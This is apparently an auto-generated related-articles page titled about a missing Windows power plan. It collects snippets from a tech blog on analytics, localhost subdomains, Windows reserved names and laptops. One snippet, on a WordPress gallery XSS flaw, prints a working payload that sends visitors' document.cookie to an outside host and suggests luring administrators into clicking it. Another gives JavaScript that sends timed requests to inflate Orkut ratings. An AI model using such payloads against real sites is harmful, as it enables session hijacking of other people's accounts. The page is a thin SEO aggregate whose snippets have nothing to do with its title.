14 Aug, 2010

Windows power saver plan missing

Articles related to windows power saver plan missing

How to Integrate another Website to Google Analytics Tracking and Adsense

http://digitalpbk.com/adsense-analytics/how-integrate-google-analytics-tracking-and-adsense How to Integrate another Website to Google Analytics Tracking and Adsense the following script on the head. window.google_analytics_uacct = "UA-XXXXXX-X"; Replace XXXXXX-X with your analytics tracking ID which you can obtain from the analytics tracking script or from the analytics setting page as shown in the image below. Then goto the analytics settings page, and click the link highlighted below Edit Adsense linking settings Adsense on analytics screenshot On Drupal You can set the header in code by drupal_set_html_head or add in the page ...
Published 2 years, 5 months ago

Making subdomains on localhost

http://digitalpbk.blogspot.com/2007/01/making-subdomains-on-localhost.html Making subdomains on localhost IntroDeveloping websites on localhost may sometimes need making of sub domains. Installing and running another server for this purpose is useless, consumes more resources etc. So here is the technique to make sub domains on localhost. You can also use this to host more than one site on localhost. i.e, you can host multiple sites situated on different folders. PS: This is for Apache-Windows configuration. (If you have info about other Server-OS configs please let ...
Published 5 years, 4 months ago

Increasing the karma ratings on Orkut

http://digitalpbk.blogspot.com/2007/01/increasing-karma-ratings-on-orkut.html , the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.You can accomplish this in javascript by the following this template: function fn(index){ var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in"); var i= new Image(); i.src = links[index]; if(index != Count) { window.setTimeout("fn("+(index+1)+")",100); } else window.location = "Somewhere"; //Redirect ...
Published 5 years, 4 months ago

Why cant a folder be named "CON" or "LPT1" in windows?

http://digitalpbk.blogspot.com/2006/11/why-cant-folder-be-named-con-or-lpt1-in.html Why cant a folder be named "CON" or "LPT1" in windows? File/Folder named CON or LPT1 on WINDOWSG:\>mkdir CONThe directory name is invalid.G:\>mkdir LPT1The directory name is invalid.G:\>mkdir LPT2The directory name is invalid.G:\>mkdir LPT9The directory name is invalid.Have you ever tried to make a folder or file named CON or LPT1 (in general LPTX X takes 1,2,3,...9)? If not try now and see that you cannot make a folder or file with those names. Have u already ...
Published 5 years, 6 months ago

How to Download Google App Engine Code

http://digitalpbk.com/google-app-engine/how-to-download-app-engine-code How to Download Google App Engine Code environments. Those in Windows should download and install Python. Downloading the Source Code via the App Engine SDK Open up a terminal at the SDK installation location, I am using C:\Program Files (x86)\Google\google_appengine Run python appcfg.py download_app -A App_name -V [Optional Version Number] <Target Folder> You will be asked to authenticate to download the app If you are authenticated by Google as the owner of the App-engine application, the application files would be downloaded ...
Published 7 months ago

Compare Dell Inspiron Laptop vs Sony Vaio

http://digitalpbk.com/sony-vaio/dell-inspiron-laptop-14r-vs-sony-vaio-vpccw26fg-laptop Compare Dell Inspiron Laptop vs Sony Vaio Base-TX / 1000Base-T x 1 Integrated 10/100 Ethernet LAN Lets now see how the windows experience index rates the two laptops. Windows Experience Index - Performance Index by Windows Sony Vaio vs Dell Inspiron Sony Vaio CW Dell Inspiron 14R Component Details Subscore Base score Processor Intel(R) Core(TM) i5 CPU M 520 @ 2.40GHz 6.7 5.8   Determined by lowest subscore Memory (RAM) 4.00 GB 5.9 Graphics ...
Published 1 year, 5 months ago

Dataone Account Usage Checker in PERL

http://digitalpbk.blogspot.com/2008/06/free-dataone-account-usage-checker-perl.html : %s\n",$sl[$i],$sl[$i+5]);}$mech->get("../logout.jsp");InstallationOn LinuxCopy paste to a new file data1.plInstall WWW::Mechanize if not already installed.Download WWW-Mechanize-1.XX.tar.gzDo the following in a terminaltar -xvvf WWW-Mechanize-1.XX.tar.gzcd WWW-Mechanize-1.XXperl Makefile.PLmakesudo make installchmod 755 data1.plOn WindowsCopy paste to a new file data1.plGet Active Perl and install if PERL is not installed.Install Module WWW::Mechanize.UsageLinux./data1.pl OptionsWindows, not TESTEDperl data1.pl OptionsPS : Comment `stty` lines when using ...
Published 3 years, 10 months ago

How to connect laptop to TV

http://digitalpbk.com/laptop-tv/how-to-connect-laptop-tv How to connect laptop to TV laptop to display your screen on TV Windows options to connect laptop and TV Open display properties on windows, and you should see a screen as shown below: If you dont see your connected monitors / TV on your laptop screen as shown above, click on the detect button as highlighted. Now the television / monitor should be detected. There are 3 modes of displaying your laptop monitor on a TV. It is called Projection options since commonly laptops are connected to projectors. You can choose ...
Published 7 months, 3 weeks ago

How to make Windows Media Player Skins

http://digitalpbk.blogspot.com/2006/12/how-to-make-windows-media-player-skins.html How to make Windows Media Player Skins What is a WMP skin?WMP or Windows Media Player Skin is a way of customizing how the media player looks. Basically a wmp skin is a .wmz file found on "X:\Program Files\Windows Media Player\Skins\" folder (Replace X with your drive letter). Here we shall atempt to create a simple skin, from which you can create more advanced skins.WMZ File FormatWMP Skins consists of a collection of files zipped together. So it means, the WMZ file on your computer ...
Published 5 years, 5 months ago

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html code can be put for stealing the cookie:(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 10 months ago

Related help topics for windows power saver plan missing More keywords like windows power saver plan missing
More pages for windows power saver plan missing


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Radha Nagar Beach Radha Nagar Beach in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk